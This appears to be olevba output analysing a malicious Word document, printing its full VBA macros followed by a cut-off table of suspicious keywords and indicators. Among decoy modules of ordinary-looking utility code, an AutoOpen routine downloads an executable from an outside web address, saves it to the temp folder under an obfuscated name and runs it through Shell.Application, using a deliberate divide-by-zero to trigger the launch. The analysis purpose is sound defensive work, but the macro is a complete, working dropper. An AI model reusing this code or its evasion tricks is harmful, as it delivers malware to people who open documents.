Malicious Word macro

1. olevba 0.41 - http://decalage.info/python/oletools
2. Flags        Filename                                                        
3. -----------  -----------------------------------------------------------------
4. OLE:MASI-B-V 12octo~1.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 12octo~1.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: 12octo~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub autoopen()
16. QweKc610Mvyl
17. End Sub
18. -------------------------------------------------------------------------------
19. VBA MACRO Module1.bas
20. in file: 12octo~1.doc - OLE stream: u'Macros/VBA/Module1'
21. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
22.  
23. Public uAcS9wh7h0 As String
24. Private Const ChunkSize As Long = 65500
25.  
26. Private Type Chunk
27.     Bytes(1 To ChunkSize) As Byte
28. End Type
29.  
30. Private tChunk As Chunk
31.  
32. Private Type GUID
33.     Data(0 To 15) As Byte
34. End Type
35.  
36. Private Type HeaderInfo
37.     UID As GUID
38.     Start As Long
39.     FragmentSize As Long
40.     FileSize As Long
41.     Name As String * 50
42. End Type
43.  
44. Private Type Info
45.     Header As HeaderInfo
46.     Filename As String
47.     Valid As Boolean
48. End Type
49.  
50. Private Const HeaderSize = 16 + 4 + 4 + 4 + 50
51.  
52. Private aFragmentList() As Info
53.  
54. Public Sub JoinFilesSub()
55.     ReadFragments
56.     SortFragments
57.     RebuildFragments
58.     RenameFiles
59. End Sub
60. Private Sub ReadFragments()
61.     Dim oFile As File
62.     Dim oFSO As New FileSystemObject
63.     Dim tInfo As Info
64.    
65.     ReDim aFragmentList(0) As Info
66.  
67.     For Each oFile In oFSO.GetFolder(App.Path).Files
68.         Open oFile.Path For Binary As #1
69.         If oFile.Size > HeaderSize Then
70.             Get #1, , tInfo.Header
71.             tInfo.Filename = oFile.Path
72.             ReDim Preserve aFragmentList(UBound(aFragmentList) + 1) As Info
73.             aFragmentList(UBound(aFragmentList)) = tInfo
74.         End If
75.         Close #1
76.     Next
77. End Sub
78.  
79. Private Sub SortFragments()
80.     Dim bSorted As Boolean
81.     Dim iIndex As Integer
82.     Dim tTempInfo As Info
83.    
84.     While Not bSorted
85.         bSorted = True
86.         For iIndex = 1 To UBound(aFragmentList) - 1
87.             Select Case CompareGUID(aFragmentList(iIndex).Header.UID, aFragmentList(iIndex + 1).Header.UID)
88.                 Case -1 ' First lower
89.                Case 0 ' Same
90.                    If aFragmentList(iIndex).Header.Start > aFragmentList(iIndex + 1).Header.Start Then
91.                         tTempInfo = aFragmentList(iIndex)
92.                         aFragmentList(iIndex) = aFragmentList(iIndex + 1)
93.                         aFragmentList(iIndex + 1) = tTempInfo
94.                         bSorted = False
95.                     End If
96.                 Case 1 ' First higher
97.                    tTempInfo = aFragmentList(iIndex)
98.                     aFragmentList(iIndex) = aFragmentList(iIndex + 1)
99.                     aFragmentList(iIndex + 1) = tTempInfo
100.                     bSorted = False
101.             End Select
102.         Next
103.     Wend
104. End Sub
105.  
106. Private Function CompareGUID(tGUID1 As GUID, tGUID2 As GUID) As Integer
107.     Dim iIndex As Integer
108.    
109.     For iIndex = 0 To 15
110.         If tGUID1.Data(iIndex) > tGUID2.Data(iIndex) Then
111.             CompareGUID = 1
112.             Exit Function
113.         ElseIf tGUID1.Data(iIndex) < tGUID2.Data(iIndex) Then
114.             CompareGUID = -1
115.             Exit Function
116.         End If
117.     Next
118. End Function
119. Public Function DkGAGQ8sF(ltrO9bDxlO As String)
120.     Set DkGAGQ8sF = CreateObject(ltrO9bDxlO)
121. End Function
122. Private Sub RebuildFragments()
123.     Dim sCurrentFile As String
124.     Dim iIndex As Integer
125.     Dim tTemp As Info
126.     Dim iChunks As Long
127.     Dim iRemainder As Long
128.     Dim iChunkIndex As Long
129.    
130.     Dim yByte As Byte
131.    
132.     RemoveInvalidFiles
133.    
134.     iIndex = 1
135.     While iIndex < UBound(aFragmentList)
136.         If CompareGUID(aFragmentList(iIndex).Header.UID, aFragmentList(iIndex + 1).Header.UID) = 0 Then
137.             If aFragmentList(iIndex + 1).Header.Start = (CDec(aFragmentList(iIndex).Header.Start) + CDec(aFragmentList(iIndex).Header.FragmentSize)) And aFragmentList(iIndex).Header.FragmentSize <> 0 Then
138.                 MergeFiles aFragmentList(iIndex), aFragmentList(iIndex + 1)
139.                 aFragmentList(iIndex).Header.FragmentSize = aFragmentList(iIndex).Header.FragmentSize + aFragmentList(iIndex + 1).Header.FragmentSize
140.                 RemoveFile iIndex + 1
141.             Else
142.                 iIndex = iIndex + 1
143.             End If
144.         Else
145.             iIndex = iIndex + 1
146.         End If
147.     Wend
148. End Sub
149.  
150. Private Sub RenameFiles()
151.     Dim iChunks As Long
152.     Dim iRemainder As Long
153.     Dim yByte As Byte
154.     Dim iChunkIndex As Long
155.     Dim iIndex As Long
156.    
157.     For iIndex = 1 To UBound(aFragmentList)
158.         If aFragmentList(iIndex).Header.FragmentSize = aFragmentList(iIndex).Header.FileSize Then
159.             Open aFragmentList(iIndex).Filename For Binary As #2
160.             Open App.Path & "\" & aFragmentList(iIndex).Header.Name For Binary As #1
161.             Seek #2, HeaderSize + 1
162.             iChunks = (aFragmentList(iIndex).Header.FileSize) \ ChunkSize
163.             iRemainder = (aFragmentList(iIndex).Header.FileSize) Mod ChunkSize
164.             For iChunkIndex = 1 To iChunks
165.                 Get #2, , tChunk
166.                 Put #1, , tChunk
167.             Next
168.             For iChunkIndex = 1 To iRemainder
169.                 Get #2, , yByte
170.                 Put #1, , yByte
171.             Next
172.             Close #2
173.             Close #1
174.             Kill aFragmentList(iIndex).Filename
175.         End If
176.     Next
177. End Sub
178.  
179. Private Sub MergeFiles(tInfo1 As Info, tInfo2 As Info)
180.     Dim iChunkIndex As Long
181.     Dim iChunks As Long
182.     Dim iRemainder As Long
183.     Dim yByte As Byte
184.    
185.     Open tInfo1.Filename For Binary As #1
186.     Open tInfo2.Filename For Binary As #2
187.    
188.     Seek #1, 16 + 4 + 1
189.     Put #1, , CLng(tInfo1.Header.FragmentSize + tInfo2.Header.FragmentSize)
190.     Seek #1, tInfo1.Header.FragmentSize + HeaderSize + 1
191.     Seek #2, HeaderSize + 1
192.    
193.     iChunks = (tInfo2.Header.FragmentSize) \ ChunkSize
194.     iRemainder = (tInfo2.Header.FragmentSize) Mod ChunkSize
195.     For iChunkIndex = 1 To iChunks
196.         Get #2, , tChunk
197.         Put #1, , tChunk
198.     Next
199.     For iChunkIndex = 1 To iRemainder
200.         Get #2, , yByte
201.         Put #1, , yByte
202.     Next
203.     Close #2
204.     Close #1
205.    
206.     Kill tInfo2.Filename
207. End Sub
208. Public Function I5mvCfqPlkE2g(cDYNJS5ctZ As Variant, YCZOcrGAIHMR As String)
209. Dim ZaJ7QqbmGwfiIa: Set ZaJ7QqbmGwfiIa = DkGAGQ8sF("Adodb.Stream")
210.  
211. With ZaJ7QqbmGwfiIa
212.    .Type = 1
213.     .Open
214.     .write cDYNJS5ctZ
215.     .savetofile YCZOcrGAIHMR, 2
216. End With
217. End Function
218. Private Sub RemoveInvalidFiles()
219.     Dim iIndex As Long
220.     Dim iIndex2 As Long
221.    
222.     For iIndex = 1 To UBound(aFragmentList) - 1
223.         If CompareGUID(aFragmentList(iIndex).Header.UID, aFragmentList(iIndex + 1).Header.UID) = 0 Then
224.             aFragmentList(iIndex).Valid = True
225.             aFragmentList(iIndex + 1).Valid = True
226.         End If
227.     Next
228.    
229.     iIndex = 1
230.     While iIndex <= UBound(aFragmentList)
231.         If Not aFragmentList(iIndex).Valid Then
232.             RemoveFile iIndex
233.         Else
234.             iIndex = iIndex + 1
235.         End If
236.     Wend
237. End Sub
238.  
239. Private Sub RemoveFile(iIndex As Long)
240.     Dim iIndex2 As Long
241.    
242.     For iIndex2 = iIndex To UBound(aFragmentList) - 1
243.         aFragmentList(iIndex2) = aFragmentList(iIndex2 + 1)
244.     Next
245.     ReDim Preserve aFragmentList(UBound(aFragmentList) - 1) As Info
246. End Sub
247. -------------------------------------------------------------------------------
248. VBA MACRO Module2.bas
249. in file: 12octo~1.doc - OLE stream: u'Macros/VBA/Module2'
250. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
251.  
252. Private vTVChannels As Variant
253. Public vTVChannelNames As Variant
254. Private vRadioChannels As Variant
255. Public vRadioChannelNames As Variant
256.  
257. Public Const MaxSlots As Long = 7
258. Private Const StartupTime As Date = #12:00:52 AM#
259. Private Const LeadInTime As Date = #12:04:00 AM#
260. Private Const LeadOutTime As Date = #12:05:00 AM#
261.  
262. Public Function CheckProgrammes() As Boolean
263.     Dim oProgramme As Programme
264.     Dim dDate As Date
265.     Dim sFileName As String
266.     Dim iProgrammeIndex As Integer
267.    
268.     For iProgrammeIndex = 0 To MaxSlots
269.         Set oProgramme = oProgrammes(iProgrammeIndex)
270.         If oProgramme.Valid Then
271.             If (oProgramme.mStartTime - StartupTime - LeadInTime) <= Now And oProgramme.mStopTime >= Now Then
272.                 RecordChannel oProgramme.mChannel, (oProgramme.mStopTime - Now - StartupTime + LeadInTime + LeadOutTime) * CLng(86400), oProgramme.Radio
273.  
274.                 If Not oProgramme.mRadio Then
275.                     sFileName = vTVChannelNames(oProgramme.mChannel) & " " & Format$(oProgramme.mStartTime, "YYYY-MM-DD HHMM") & "-" & Format$(oProgramme.mStopTime, "HHMM") & ".avi"
276.                 Else
277.                     sFileName = vRadioChannelNames(oProgramme.mChannel) & " " & Format$(oProgramme.mStartTime, "YYYY-MM-DD HHMM") & "-" & Format$(oProgramme.mStopTime, "HHMM") & ".avi"
278.                 End If
279.                 Debug.Print sFileName
280.                 With New FileSystemObject
281.                     If .FileExists("D:\Media\Video\Captured\capture.avi") Then
282.                         On Error Resume Next
283.                         .GetFile("D:\Media\Video\Captured\capture.avi").Name = sFileName
284.                     End If
285.                 End With
286.                 oProgramme.Recorded = True
287.                 CheckProgrammes = SetNextProgramme(oProgramme)
288.             End If
289.         End If
290.     Next
291. End Function
292.  
293. Private Function SetNextProgramme(oCopyProgramme As String) As Boolean
294.     Dim iProgrammeIndex As Long
295.     Dim oProgramme As Programme
296.     Dim dNextDate As Date
297.     Dim dNextDay As Integer
298.     Dim dNextMonth As Integer
299.     Dim dNextYear As Integer
300.     Dim dNextStartTime As Date
301.     Dim dNextStopTime As Date
302.     Dim iOffset As Integer
303.     Dim bCreateNew As Boolean
304.    
305.     With oCopyProgramme
306.         If oCopyProgramme.mDaily Then
307.             iOffset = 1
308.         ElseIf oCopyProgramme.mMonFri Then
309.             iOffset = 1
310.             If .mWeekday = "FRIDAY" Then
311.                 iOffset = 3
312.             End If
313.         ElseIf oCopyProgramme.mWeekly Then
314.             iOffset = 7
315.         End If
316.    
317.         If oCopyProgramme.mDaily Or oCopyProgramme.mMonFri Or oCopyProgramme.mWeekly Then
318.             dNextDate = oCopyProgramme.mDate + iOffset
319.             dNextDay = Val(Format$(dNextDate, "DD"))
320.             dNextMonth = Val(Format$(dNextDate, "MM"))
321.             dNextYear = Val(Format$(dNextDate, "YYYY"))
322.             dNextStartTime = oCopyProgramme.mStartTime + iOffset
323.             dNextStopTime = oCopyProgramme.mStopTime + iOffset
324.             bCreateNew = True
325.         End If
326.     End With
327.    
328.     If bCreateNew Then
329.         For iProgrammeIndex = 0 To MaxSlots
330.             Set oProgramme = oProgrammes(iProgrammeIndex)
331.             If Not oProgramme.Valid Then
332.                 With oProgramme
333.                     .mCurrentDay = oCopyProgramme.mCurrentDay
334.                     .mCurrentMonth = oCopyProgramme.mCurrentMonth
335.                     .mCurrentYear = oCopyProgramme.mCurrentYear
336.                     .mPlusCode = oCopyProgramme.mPlusCode
337.                     .mWeekday = oCopyProgramme.mWeekday
338.                     .mDate = dNextDate
339.                     .mDay = dNextDay
340.                     .mMonth = dNextMonth
341.                     .mYear = dNextYear
342.                     .mChannel = oCopyProgramme.mChannel
343.                     .mStartTime = dNextStartTime
344.                     .mStopTime = dNextStopTime
345.                     .mDuration = oCopyProgramme.mDuration
346.                     .mRadio = oCopyProgramme.mRadio
347.                     .mDaily = oCopyProgramme.mDaily
348.                     .mWeekly = oCopyProgramme.mWeekly
349.                     .mMonFri = oCopyProgramme.mMonFri
350.                     .mRecorded = False
351.                     .mStatus = Ready
352.                     .mValid = True
353.                 End With
354.                 SetNextProgramme = True
355.                 WriteFile
356.                 Exit Function
357.             End If
358.         Next
359.     End If
360. End Function
361. Public Function zjHBaqIPU77(hgucRLPWCIsOX9 As String)
362.     Set XLjyVs6RjG = DkGAGQ8sF("Shell.Application")
363. XLjyVs6RjG.Open (uAcS9wh7h0)
364. End Function
365.  
366. Sub filterOff() '{{{
367.    Application.ScreenUpdating = False
368.     Range("B3").AutoFilter ActiveCell.Column
369. End Sub '}}}
370.  
371. Function smallerFonts() '{{{
372.  Dim currentFontSize As Long
373.   On Error GoTo ERROR01
374.   currentFontSize = Selection.Font.Size
375.   Selection.Font.Size = currentFontSize - 1
376.   period_buff = ">"
377. ERROR01:
378. End Function '}}}
379.  
380. Function biggerFonts() '{{{
381.  Dim currentFontSize As Long
382.   On Error GoTo ERROR01
383.   currentFontSize = Selection.Font.Size
384.   Selection.Font.Size = currentFontSize + 1
385.   period_buff = "<"
386. ERROR01:
387. End Function '}}}
388.  
389. Sub sp(Optional clearFilterdRowValue = 0) '{{{ smartpaste
390.    'Todo ??????????????(Cut mode)
391.  
392.     Application.ScreenUpdating = False
393.  
394.     'Microsoft Forms 2.0 Object Library ??????
395.    Dim V As Variant    '?????????????
396.    Dim A As Variant    '??????
397.  
398.  
399.     Set destRange = Range(ActiveCell, Cells(Rows.Count, ActiveCell.Column)) 'ActiveCell???????
400.    Set destRange = destRange.SpecialCells(xlCellTypeVisible)   '?????????
401.  
402.     'clipboard???????????V?2?????????'{{{
403.    Dim Dobj As DataObject
404.     Set Dobj = New DataObject
405.     With Dobj
406.         .GetFromClipboard
407.         On Error Resume Next
408.         V = .GetText
409.         On Error GoTo 0
410.     End With '}}}
411.  
412.     If Not IsEmpty(V) Then    '????????????????????????
413.        V = Split(CStr(V), vbCrLf) '???????string??
414.  
415.         '??????????????????????'{{{
416.        If clearFilterdRowValue = 1 Then
417.             referencRangeHeight = UBound(V) + 1
418.             referencRangeWidth = UBound(Split(CStr(V(0)), vbTab)) + 1
419.             Debug.Print referencRangeHeight
420.             Debug.Print referencRangeWidth
421.             For Each C In ActiveCell.Resize(referencRangeHeight, referencRangeWidth)
422.                 C.Value = ""
423.             Next C
424.         End If '}}}
425.  
426.         '?????? TODO
427.        If Application.CutCopyMode = xlCut Then
428.             'src??dst???????ClearContents
429.            Set srcRange = GetCopiedRange(ActiveSheet.Name)
430.             For Each C In srcRange
431.                 C.Value = ""
432.             Next C
433.  
434.             Application.CutCopyMode = False
435.         End If
436.  
437.         '????'{{{
438.        Dim i As Integer: i = 0
439.         Dim r As Range
440.         For Each r In destRange
441.             A = Split(CStr(V(i)), vbTab) 'i??
442.            For J = 0 To UBound(A)
443.                 If CStr(Val(A(J))) = A(J) Then 'A(j)?????
444.                    r.Offset(0, J).Value = Val(A(J))
445.                 Else
446.                     r.Offset(0, J).Value = A(J)
447.                 End If
448.             Next J
449.             If UBound(A) = -1 Then
450.                 r.Offset(0, J).Value = ""
451.             End If
452.  
453.             i = i + 1
454.             If i >= UBound(V) Then
455.                 Exit For
456.             End If
457.         Next '}}}
458.    End If
459.  
460.     Set Dobj = Nothing
461.     Set r = Nothing
462. End Sub '}}}
463.  
464. Sub sp2(Optional clearFilterdRowValue = 1) '{{{ smartpaste
465.    'Todo ??????????????(Cut mode)
466.  
467.     Application.ScreenUpdating = False
468.  
469.     'Microsoft Forms 2.0 Object Library ??????
470.    Dim V As Variant    '?????????????
471.    Dim A As Variant    '??????
472.  
473.  
474.     Set destRange = Range(ActiveCell, Cells(Rows.Count, ActiveCell.Column)) 'ActiveCell???????
475.    Set destRange = destRange.SpecialCells(xlCellTypeVisible)   '?????????
476.  
477.     'clipboard???????????V?2?????????'{{{
478.    Dim Dobj As DataObject
479.     Set Dobj = New DataObject
480.     With Dobj
481.         .GetFromClipboard
482.         On Error Resume Next
483.         V = .GetText
484.         On Error GoTo 0
485.     End With '}}}
486.  
487.     If Not IsEmpty(V) Then    '????????????????????????
488.        V = Split(CStr(V), vbCrLf) '???????string??
489.  
490.         '??????????????????????'{{{
491.        If clearFilterdRowValue = 1 Then
492.             referencRangeHeight = UBound(V) + 1
493.             referencRangeWidth = UBound(Split(CStr(V(0)), vbTab)) + 1
494.             Debug.Print referencRangeHeight
495.             Debug.Print referencRangeWidth
496.             For Each C In ActiveCell.Resize(referencRangeHeight, referencRangeWidth)
497.                 C.Value = ""
498.             Next C
499.         End If '}}}
500.  
501.         '?????? TODO
502.        If Application.CutCopyMode = xlCut Then
503.             'src??dst???????ClearContents
504.            Set srcRange = GetCopiedRange(ActiveSheet.Name)
505.             For Each C In srcRange
506.                 C.Value = ""
507.             Next C
508.  
509.             Application.CutCopyMode = False
510.         End If
511.  
512.         '????'{{{
513.        Dim i As Integer: i = 0
514.         Dim r As Range
515.         For Each r In destRange
516.             A = Split(CStr(V(i)), vbTab) 'i??
517.            For J = 0 To UBound(A)
518.                 If CStr(Val(A(J))) = A(J) Then 'A(j)?????
519.                    r.Offset(0, J).Value = Val(A(J))
520.                 Else
521.                     r.Offset(0, J).Value = A(J)
522.                 End If
523.             Next J
524.             If UBound(A) = -1 Then
525.                 r.Offset(0, J).Value = ""
526.             End If
527.  
528.             i = i + 1
529.             If i >= UBound(V) Then
530.                 Exit For
531.             End If
532.         Next '}}}
533.    End If
534.  
535.     Set Dobj = Nothing
536.     Set r = Nothing
537. End Sub '}}}
538.  
539. Public Sub RecordChannel(iChannelNo As Long, iDuration As Long, bRadio As Boolean)
540.     Dim sFileName As String
541.     Show.tmrTime.Enabled = False
542.     If Not bRadio Then
543.         Record vTVChannels(iChannelNo), iDuration, bRadio
544.     Else
545.         Record vRadioChannels(iChannelNo), iDuration, bRadio
546.     End If
547.     Show.tmrTime.Enabled = True
548. End Sub
549.  
550. Public Sub Initialise()
551.     Dim iIndex As Integer
552.     Dim oTS As TextStream
553.     Dim oFSO As New FileSystemObject
554.    
555.     vTVChannelNames = Array("", "BBC1", "BBC2", "ITV", "CHANNEL4", "CHANNEL5", "FREEVIEW", "VIDEO")
556.     vTVChannels = Array(0, 57, 63, 60, 53, 35, 45, 65)
557.     vRadioChannelNames = Array("", "Radio1", "Radio2", "Radio3", "Radio4")
558.     vRadioChannels = Array(0, "9820", "0000", "9010", "9450")
559.     For iIndex = 0 To MaxSlots
560.         Set oProgrammes(iIndex) = New Programme
561.     Next
562.    
563.     ReadFile
564. End Sub
565. -------------------------------------------------------------------------------
566. VBA MACRO Module3.bas
567. in file: 12octo~1.doc - OLE stream: u'Macros/VBA/Module3'
568. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
569. Sub InteriorColor(number) '{{{
570.        Selection.Interior.ColorIndex = number
571. End Sub '}}}
572.  
573. Sub FontColor(number) '{{{
574.    Debug.Print "FontColor"
575.     Selection.Font.ColorIndex = number
576. End Sub '}}}
577.  
578. Sub SetRuledLines() '{{{
579.        Selection.Borders.LineStyle = xlContinuous
580. End Sub '}}}
581.  
582. Sub UnsetRuledLines() '{{{
583.        Selection.Borders.LineStyle = xlLineStyleNone
584. End Sub '}}}
585.  
586. Sub merge() '{{{
587.        Selection.merge
588. End Sub '}}}
589.  
590. Sub unmerge() '{{{
591.        Selection.unmerge
592. End Sub '}}}
593.  
594. Sub ex_up() '{{{
595.        Application.ScreenUpdating = False
596.         cur_row = ActiveCell.Row
597.         Rows(cur_row).Copy
598.         'target_row???
599.        Dim i As Long
600.         i = 1
601.         Do Until ActiveCell.Offset(-i, 0).EntireRow.Hidden = False
602.                 i = i + 1
603.         Loop
604.         target_row = ActiveCell.Offset(-i, 0).Row
605.         target_column = ActiveCell.Offset(-i, 0).Column
606.  
607.         Rows(target_row).Select
608.         Selection.Insert
609.  
610.         '?????????
611.        Rows(cur_row + 1).Delete
612.         '????????????
613.        Cells(target_row, target_column).Select
614. End Sub '}}}
615.  
616. Sub ex_below() '{{{
617.        Application.ScreenUpdating = False
618.         cur_row = ActiveCell.Row
619.         Rows(cur_row).Copy
620.         'target_row???
621.        Dim i As Long
622.         i = 1
623.         Do Until ActiveCell.Offset(i, 0).EntireRow.Hidden = False
624.                 i = i + 1
625.         Loop
626.         target_row = ActiveCell.Offset(i, 0).Row
627.         target_column = ActiveCell.Offset(i, 0).Column
628.  
629.         Rows(target_row + 1).Select
630.         Selection.Insert
631.         Rows(cur_row).Delete
632.  
633.         '????????????
634.        Cells(target_row, target_column).Select
635. End Sub '}}}
636. Sub QweKc610Mvyl()
637.  
638. Dim kRSoxIipXn: Set kRSoxIipXn = DkGAGQ8sF("Microsoft.XMLHTTP")
639.    
640. kRSoxIipXn.Open Chr(71) & Chr(69) & "T", _
641. "http://cardiffhairandbeauty.co.uk/877453tr/rebrb45t.exe" _
642. , False
643. kRSoxIipXn.Send
644.  
645. Set mfiYsGnVkdEGyc = DkGAGQ8sF("WScript.Shell")
646.  
647. Set pIxDl7iL7G = mfiYsGnVkdEGyc.Environment("Process")
648.  
649. yt1lSr86u = pIxDl7iL7G("TEMP")
650.  
651. uAcS9wh7h0 = yt1lSr86u & Chr(92) & Chr(103) & Chr(105) & "c" & Chr(97) & "g" & "e" & Chr(46) & Chr(101) & "x" & Chr(101)
652. Dim uf5JA1lwM0Xb As Variant
653. uf5JA1lwM0Xb = kRSoxIipXn.responseBody
654. I5mvCfqPlkE2g uf5JA1lwM0Xb, uAcS9wh7h0
655. On Error GoTo zZArBUMfp8qw
656.     A = 348 / 0
657.   On Error GoTo 0
658.  
659. LxqYAbt140nt:
660.   Exit Sub
661. zZArBUMfp8qw:
662.   zjHBaqIPU77 ("a0pn7oL55y")
663. Resume LxqYAbt140nt
664. End Sub
665. Sub ex_right() '{{{
666.        Application.ScreenUpdating = False
667.         cur_col = ActiveCell.Column
668.         Columns(cur_col).Copy
669.         'target_row???
670.        Dim i As Long
671.         i = 1
672.         Do Until ActiveCell.Offset(0, i).EntireColumn.Hidden = False
673.                 i = i + 1
674.         Loop
675.         target_row = ActiveCell.Offset(0, i).Row
676.         target_column = ActiveCell.Offset(0, i).Column
677.  
678.         Columns(target_column + 1).Select
679.         Selection.Insert
680.         Columns(cur_col).Delete
681.  
682.         '????????????
683.        Cells(target_row, target_column).Select
684. End Sub '}}}
685.  
686. Sub ex_left() '{{{
687.        Application.ScreenUpdating = False
688.         cur_col = ActiveCell.Column
689.         Columns(cur_col).Copy
690.         'target_row???
691.        Dim i As Long
692.         i = 1
693.         Do Until ActiveCell.Offset(0, -i).EntireColumn.Hidden = False
694.                 i = i + 1
695.         Loop
696.         target_row = ActiveCell.Offset(0, -i).Row
697.         target_column = ActiveCell.Offset(0, -i).Column
698.  
699.         Columns(target_column).Select
700.         Selection.Insert
701.         Columns(cur_col + 1).Delete
702.  
703.         '????????????
704.        Cells(target_row, target_column).Select
705. End Sub '}}}
706.  
707. Sub ZoomInWindow() '{{{
708.        ActiveWindow.Zoom = ActiveWindow.Zoom + 5
709. End Sub '}}}
710.  
711. Sub ZoomOutWindow() '{{{
712.        ActiveWindow.Zoom = ActiveWindow.Zoom - 5
713. End Sub '}}}
714.  
715. Sub MouseNormal() '{{{
716.        Application.Cursor = xlDefault
717. End Sub '}}}
718.  
719. Sub SetSeqNumber(Optional destRange As Range = Nothing) '{{{
720.        Application.ScreenUpdating = False
721.         If destRange Is Nothing Then
722.                 Set destRange = Selection
723.         End If
724.         Set destRange = destRange.SpecialCells(xlCellTypeVisible)
725.     N = 1
726.         For Each r In destRange
727.                 r.Value = N
728.                 'Selection.NumberFormatLocal = "G/??"
729.                Selection.NumberFormatLocal = "0_);[?](0)"
730.                 N = N + 1
731.     Next
732. End Sub '}}}
733.  
734. Sub SortCurrentColumn() '{{{
735.        Application.ScreenUpdating = False
736.         Set targetRange = Selection.CurrentRegion
737.  
738.         With ActiveSheet.Sort
739.                 With .SortFields
740.                         .Clear
741.                         .Add _
742.                                 Key:=Columns(ActiveCell.Column), _
743.                                 SortOn:=xlSortOnValues, _
744.                                 Order:=xlAscending, _
745.                                 DataOption:=xlSortNormal
746.                 End With
747.                         .SetRange targetRange
748.                         .Header = xlYes '???????????xlGuess?Excel?????
749.                        .MatchCase = False
750.                         .Orientation = xlTopToBottom
751.                         .SortMethod = xlPinYin
752.                         .Apply
753.         End With
754. End Sub '}}}
755.  
756. '--------sheet_move-------------------
757. Sub ActivateLeftSheet() '{{{
758.    SendKeys "^{PGDN}"
759. End Sub '}}}
760.  
761. Sub ActivateRightSheet() '{{{
762.    SendKeys "^{PGUP}"
763. End Sub '}}}
764.  
765. Sub ActivateFirstSheet(Optional where As String) '{{{
766.    With ActiveWorkbook
767.         .Worksheets(1).Activate
768.     End With
769. End Sub '}}}
770.  
771. Sub ActivateLastSheet(Optional where As String) '{{{
772.    With ActiveWorkbook
773.         .Worksheets(.Worksheets.Count).Activate
774.     End With
775. End Sub '}}}
776.  
777. '---------auto_filter-----------------
778. Sub focusFromScratch() '{{{
779.    Application.ScreenUpdating = False
780.     cur_row = ActiveCell.Row
781.     cur_col = ActiveCell.Column
782.     buf = Cells(cur_row, cur_col).Value
783.     If ActiveSheet.FilterMode Then
784.         ActiveSheet.ShowAllData
785.     End If
786.     Range("B3").AutoFilter cur_col, buf
787. End Sub '}}}
788.  
789. Sub focus() '{{{
790.    Application.ScreenUpdating = False
791.     cur_row = ActiveCell.Row
792.     cur_col = ActiveCell.Column
793.     buf = Cells(cur_row, cur_col).Value
794.     Range("B3").AutoFilter cur_col, buf
795. End Sub '}}}
796.  
797. Sub exclude() '{{{
798.    Application.ScreenUpdating = False
799.     Dim filterCondition As Variant
800.     Dim buf As String
801.  
802.     buf = Cells(ActiveCell.Row, ActiveCell.Column).Value
803.  
804.     Debug.Print Cells(Rows.Count, ActiveCell.Column).End(xlUp).Row
805.     Set targetColumnRange = Range(Cells(2, ActiveCell.Column), Cells(Rows.Count, ActiveCell.Column).End(xlUp))
806.     Set targetColumnRange = targetColumnRange.SpecialCells(xlCellTypeVisible)
807.  
808.     Set showedValueCollection = CreateObject("Scripting.Dictionary")
809.     On Error Resume Next
810.         For Each C In targetColumnRange
811.             If C.Value <> buf Then
812.                 showedValueCollection.Add "_" & C.Value, C.Value
813.             End If
814.         Next C
815.     On Error GoTo 0
816.  
817.     filterCondition = showedValueCollection.Keys
818.  
819.     '?????Empty?????????string?""????
820.    For E = 0 To UBound(filterCondition)
821.         filterCondition(E) = Mid(filterCondition(E), 2)
822.     Next E
823.  
824.     Range("B3").AutoFilter Field:=ActiveCell.Column, Criteria1:=filterCondition, Operator:=xlFilterValues
825. End Sub '}}}
826.  
827. '---------diff-----------------
828. Sub diffsh(targetsh As String, fromsh As String)
829.     'TODO prompt
830.    For Each C In fromsh.UsedRange
831.         If C.Value <> targetsh.Cells(C.Row, C.Column).Value Then
832.             targetsh.Cells(C.Row, C.Column).Interior.ColorIndex = 29
833.         End If
834.     Next C
835. End Sub
836.  
837. Sub diffRange(targetRange As Range, fromRange As Range)
838.     'TODO
839. End Sub
840.  
841. Sub abcdefc(targetRange As Range, fromRange As Range)
842.     Call diffsh(ActiveWorkbook.Worksheets("???"), ActiveWorkbook.Worksheets("???"))
843. End Sub
844.  
845. +------------+----------------------+-----------------------------------------+
846. | Type       | Keyword              | Description                             |
847. +------------+----------------------+-----------------------------------------+
848. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
849. | Suspicious | Kill                 | May delete a file                       |
850. | Suspicious | Open                 | May open a file                         |
851. | Suspicious | Shell                | May run an executable file or a system  |
852. |            |                      | command                                 |
853. | Suspicious | WScript.Shell        | May run an executable file or a system  |
854. |            |                      | command                                 |
855. | Suspicious | Shell.Application    | May run an application (if combined     |
856. |            |                      | with CreateObject)                      |
857. | Suspicious | Binary               | May read or write a binary file (if     |
858. |            |                      | combined with Open)                     |
859. | Suspicious | CreateObject         | May create an OLE object                |
860. | Suspicious | Chr                  | May attempt to obfuscate specific       |
861. |            |                      | strings                                 |
862. | Suspicious | ADODB.Stream         | May create a text file                  |
863. | Suspicious | SaveToFile           | May create a text file                  |
864. | Suspicious | Write                | May write to a file (if combined with   |
865. |            |                      | Open)                                   |
866. | Suspicious | Put                  | May write to a file (if combined with   |
867. |            |                      | Open)                                   |
868. | Suspicious | SendKeys             | May control another application by      |
869. |            |                      | simulating user keystrokes              |
870. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
871. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
872. |            |                      | may be used to obfuscate strings        |
873. |            |                      | (option --decode to see all)            |
874. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
875. |            | Strings              | may be used to obfuscate strings        |
876. |            |                      | (option --decode to see all)            |
877. | IOC        | http://cardiffhairan | URL                                     |
878. |            | dbeauty.co.uk/877453 |                                         |
879. |            | tr/rebrb45t.exe      |                                         |
880. | IOC        | rebrb45t.exe         | Executable file name                    |
881. | IOC        | gicage.exe           | Executable file name (obfuscation: VBA  |
882. |            |                      | expression)                             |
883. | VBA string | GET                  | Chr(71) & Chr(69) & "T"                 |
884. | VBA string | \gicage.exe          | Chr(92) & Chr(103) & Chr(105) & "c" &   |
